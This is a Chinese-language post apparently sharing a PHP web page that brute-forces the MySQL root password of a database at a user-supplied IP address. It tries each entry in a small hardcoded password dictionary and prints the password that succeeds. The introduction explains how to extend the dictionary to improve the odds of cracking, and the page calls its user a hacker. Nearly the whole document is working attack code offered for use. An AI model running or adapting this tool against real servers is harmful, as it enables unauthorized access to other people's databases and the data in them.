Mysql PHP版本爆破小腳本
(注意:從代碼可以看出用戶名是個變量,一般數據庫賬號不會變,所以用戶名沒用數組作為字典。密碼是用數組作為字典。字典可根據規矩擴展,破解的成功與失敗,就看你擴展的字典強大不強大了。用法:保存代碼為MysqlDatabaseBlasting.php,浏覽器打開就可使用。 )
/*
* author:Bearcat 2016-10-5
*/
<html>
<head>
<title>Mysql賬號密碼爆破工具</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<center>
<br><br>
<h1>MysqlDatabaseBlasting(Mysql賬號密碼在線爆破工具 V1.0)</h1>
<br>
<?php
if(@$_POST['submit']){
$host = @$_POST['host'];
if($host!=""){
$username = "root";//用戶名字典
$password = array('','123456','admin','root','ccf304vn'); //密碼字典
echo "<hr><br>--------------------爆破狀態--------------------<br>";
echo "密碼錯誤次數:";
for ($i=0; $i <= count($password); $i++) {
if(@mysql_connect($host, $username, $password[$i])){
echo "<br><br><font color='red'>爆破成功--密碼-->".@$password[$i]."</font>";
break;
}else{
echo $i."、";
continue;
}
}
echo "<br>--------------------爆破結束--------------------<br><hr>";
}else{
echo "<script>alert('黑客,輸入數據庫IP地址')</script>";
}
}
?>
<br><br><br><br>
<form action="MysqlDatabaseBlasting.php" method="post">
數據庫IP地址:<input type="text" name="host"/>
<input type="submit" value="爆破" name="submit"/>
</form>
<center>
</body>
</html>
